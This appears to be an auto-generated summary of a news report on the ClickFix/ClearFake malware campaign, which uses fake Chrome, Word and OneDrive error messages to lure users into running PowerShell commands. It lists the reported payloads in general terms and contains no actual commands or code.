June 17, 2024 at 06:35PM
A new malware distribution campaign utilizes fake Google Chrome, Word, and OneDrive errors to deceive users into running malicious PowerShell “fixes,” leading to malware installation. The campaign is linked to threat actors responsible for ClearFake, ClickFix, and TA571 attacks, employing various tactics such as website overlays and HTML attachments to prompt users into executing harmful commands. Multiple malware payloads have been observed, and the campaign demonstrates active experimentation by the threat actors to enhance effectiveness and widen the scope of their attacks. (Word count: 98)
Based on the meeting notes, the key takeaways are as follows:
– A new malware distribution campaign utilizes fake Google Chrome, Word, and OneDrive errors to deceive users into running malicious PowerShell “fixes” that install malware.
– The campaign is being used by multiple threat actors, including those behind ClearFake, a new attack cluster called ClickFix, and the TA571 threat actor known for operating as a spam distributor.
– Previous ClearFake attacks utilized website overlays that prompted the installation of fake browser updates, while the new attacks display fake Google Chrome, Microsoft Word, and OneDrive errors, prompting visitors to copy a PowerShell “fix” into the clipboard and then run it.
– The payloads observed by Proofpoint include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer.
– The attack chains differentiate mainly on their initial stages, but all lead to malware infections through the execution of PowerShell scripts.
– The threat actors take advantage of users’ lack of awareness about the risks of executing PowerShell commands and Windows’ inability to detect and block the malicious actions initiated by the pasted code.
These clear takeaways summarize the key points from the meeting notes, providing an overview of the new malware distribution campaign and the methods used by threat actors to install malware.